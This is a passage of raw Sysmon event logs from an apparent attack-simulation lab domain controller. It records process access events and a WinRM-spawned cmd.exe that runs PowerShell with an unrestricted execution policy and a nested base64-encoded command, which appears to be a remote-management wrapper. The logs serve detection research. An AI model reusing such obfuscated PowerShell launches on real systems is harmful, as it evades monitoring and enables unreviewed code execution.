07:58:55.720","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.738\r\nProcessGuid: {41C8662E-20BF-5F25-0000-0010B6C50600}\r\nProcessId: 1640\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nParentProcessId: 3472\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.738","ProcessGuid":"{41C8662E-20BF-5F25-0000-0010B6C50600}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20BF-5F25-0000-0010F4C20600}","ParentProcessId":"3472","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nSourceProcessId: 3472\r\nSourceThreadId: 5032\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010B6C50600}\r\nTargetProcessId: 1640\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-0010F4C20600}","SourceProcessId":"3472","SourceThreadId":"5032","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010B6C50600}","TargetProcessId":"1640","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010B6C50600}\r\nTargetProcessId: 1640\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010B6C50600}","TargetProcessId":"1640","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
